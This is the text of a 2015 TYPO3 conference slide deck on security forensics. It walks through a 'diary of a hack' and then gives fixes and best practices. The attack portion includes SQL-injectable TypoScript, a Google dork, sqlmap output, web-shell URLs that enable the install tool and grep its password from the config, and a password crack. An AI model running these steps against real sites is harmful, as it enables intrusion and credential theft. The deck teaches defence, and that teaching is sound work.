Inspiring people toshare

TYPO3 Developer Days 2015

Securtiy Forensics

TYPO3 Developer Days 2015

Helmut Hummel <typo3@helhum.io>

17.07.2015

Securtiy Forensics

1

Inspiring people toshare

#CertiFUNcation - Brühl 2015

Secure TYPO3

#CertiFUNcation 2015

Agenda• Diary of a Hack

• Pitfalls

• Best Practice

2

Diary of a Hack

3

Diary of a Hack

Day 1 - Implementing a feature

4

Diary of a Hack

5

lib.sqliSimple = CONTENT lib.sqliSimple { table = tt_content select.where.wrap = colPos=| select.where.data = GP:colPos }

Diary of a Hack

6

lib.sqliSearch = CONTENT lib.sqliSearch { table = tt_content select.where.wrap = header like '%|%' select.where.data = GP:search }

Diary of a Hack

Day 2 - Testing the feature

7

Diary of a Hack

8

Diary of a Hack

9

'BE/debug' => '1''FE/debug' => '1''SYS/devIPmask' => '*''SYS/displayErrors' => '1''SYS/sqlDebug' => '1''SYS/exceptionalErrors' => '28674'

Diary of a Hack

10

Diary of a Hack

11

'DB/username' => 'root'

Diary of a Hack

12

Diary of a Hack

Day 3 - Distraction

13

Diary of a Hack

14

Diary of a Hack

Day 4 - Attraction

15

Diary of a Hack

16

https://www.google.de/?q=exec_SELECTquery+%22You+have+an+error+in+your+SQL+syntax%22

Diary of a Hack

Day 5 - Exploitation

17

Disclaimer

18

Don’t do this at home!

19

Diary of a Hack

20

$ sqlmap -u 'http://security.dev/insecurity/?colPos=0' -p 'colPos'!GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 30 HTTP(s) requests:

Diary of a Hack

21

Diary of a Hack

22

http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL!http://security.dev/typo3/sysext/install/Start/Install.php!http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword%20typo3conf/LocalConfiguration.php

Diary of a Hack

23

$ john pwLoaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])password (dummy)guesses: 1 time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015) c/s: 900 trying: 123456 - fishing

Diary of a Hack

24

Diary of a Hack

Day 5 - Discovery

25

Diary of a Hack

Discovery• Take site offline!

• seriously

• I mean it

26

27

Diary of a Hack

Day 6 - Analysis

28

Diary of a Hack

Analysis• Make a backup of current state (files, DB)

• Search all logs for „suspicious“ entries

• Try to reproduce assumed entry points

• If in doubt: get help

29

Diary of a Hack

Day 7 - Fix

30

Diary of a Hack

31

lib.sqliSimple = CONTENT lib.sqliSimple { table = tt_content select.where = colPos=###colPos### select.markers { colPos.data = GP:colPos } }

Diary of a Hack

32

lib.sqliSearch = CONTENT lib.sqliSearch { table = tt_content select.where = header like ###search### select.markers { search.data = GP:search search.wrap = %|% } }

Diary of a Hack

Fix• Close security issue in Code/ Extension/ Core

• Restore from backup

• Or if you really know what you are doing: cleanup installation

• Go online again

• Plan improvements (education, monitoring, …)

33

Thank you!@helhum

http://insight.helhum.io typo3@helhum.io

34

Inspiring people toshare

TYPO3 Developer Days 2015

Securtiy Forensics

Further Pitfalls

35

Inspiring people toshare

TYPO3 Developer Days 2015

Securtiy Forensics 36

Secure TYPO3

Types of Security Threats• Information disclosure

• SQL injection

• Cross Site Scripting (XSS)

• http://docs.typo3.org/typo3cms/SecurityGuide/TypesOfThreats/Index.html

• https://www.owasp.org/index.php/Category:Attack

37

Inspiring people toshare

TYPO3 Developer Days 2015

Securtiy Forensics

TypoScript

38

page.10 = TEXT page.10.field = title page.10.wrap = <h1 class="c-{field:layout}">|</h1> page.10.insertData = 1

39

page.10 = TEXT # title can contain: {DB:be_users:1:password} page.10.field = title page.10.wrap = <h1 class="c-{field:layout}">|</h1> page.10.insertData = 1

40

page.10 = TEXT page.10.field = title page.10.wrap = <h1 class="c-{field:layout}">|</h1> page.10.insertData = 1

41

page.10 = TEXT page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>

42

page.10 = TEXT # title can contain HTML page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>

43

page.10 = TEXT page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1> page.10.htmlSpecialChars = 1

44

page.10 = TEXT page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1> page.10.htmlSpecialChars = 1

45

page.10 = TEXT # Avoid dataWrap or insertData if possible # layout field might not be safe page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1> page.10.htmlSpecialChars = 1

46

Inspiring people toshare

TYPO3 Developer Days 2015

Securtiy Forensics

Fluid

47

Inspiring people toshare

#CertiFUNcation - Brühl 2015

Secure TYPO3

Extbase

XSS even when using Fluid• Flash Messages

• HTML Context

• Custom View Helpers

48

Inspiring people toshare

TYPO3 Developer Days 2015

Securtiy Forensics

Best Practice

49

Inspiring people toshare

#CertiFUNcation - Brühl 2015

Secure TYPO3

Best Practice• Defined Process

• Regular updates

• Backups

• Monitoring

• Education

• Reserve time for all of the above

• More in: http://docs.typo3.org/typo3cms/SecurityGuide/

50

Questions?

51

Inspiring people toshare

#CertiFUNcation - Brühl 2015

Secure TYPO3

Secure TYPO3 - Diary of a Hack

Resources• http://sqlmap.org

• http://www.openwall.com/john/

• http://docs.typo3.org/typo3cms/SecurityGuide/

• https://www.owasp.org/

52

Thank you!@helhum

http://insight.helhum.io typo3@helhum.io

53